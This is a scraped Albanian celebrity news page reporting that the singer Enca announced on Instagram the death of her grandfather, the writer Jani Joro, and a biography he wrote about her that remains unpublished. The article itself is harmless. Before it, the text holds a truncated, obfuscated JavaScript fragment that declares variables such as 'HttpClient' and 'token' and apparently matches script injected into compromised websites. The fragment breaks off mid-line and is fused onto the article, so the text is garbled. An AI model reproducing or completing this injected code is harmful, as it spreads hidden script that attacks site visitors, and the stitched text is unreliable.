;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një ditë Enca do të mund të ndajë me ne dhuratën e mrekullueshme që i ka lënë gjyshi i ndjerë

By

Me anë të një postimi në llogarinë e saj në Instagram, Enca ka bërë të ditur që gjyshi i saj, Jani Joro është ndarë nga jeta.

“Gjyshi im i mrekullueshëm, artist në shpirt dhe vepra, të dua dhe do të kujtoj gjithmonë” u shpreh ajo.

Gjyshi i saj i ndjerë ishte një person që gjithë jetës së tij ia kishte dedikuar artit dhe letërsisë.

Duke qenë edhe një shkrimtar i botuar, ai ka shkruar një biografi për mbesën e tij që nuk është publikuar asnjëherë.

Sipas këngëtares, ai libër do të publikohet kur ajo ta ndiejë veten të gatshme ta bëjë.

“Gjyshi i ka dedikuar jetën edukimit dhe artit, veçanërisht librit si shkrimtar i disa prej tyre”, shkruan ajo në postimin e saj.

“Disa vite më parë, ai shkroi një biografi të detajuar dhe emocionuese mbi karrierën time artistike, të cilën nuk u ndjeva gati për ta publikuar në atë kohë. Por një ditë do e bëj dhe do ia dedikoj gjyshit tim, Jani Joro”, përfundon ajo postimin e saj. /Prive.al

Artikuj të ngjashëm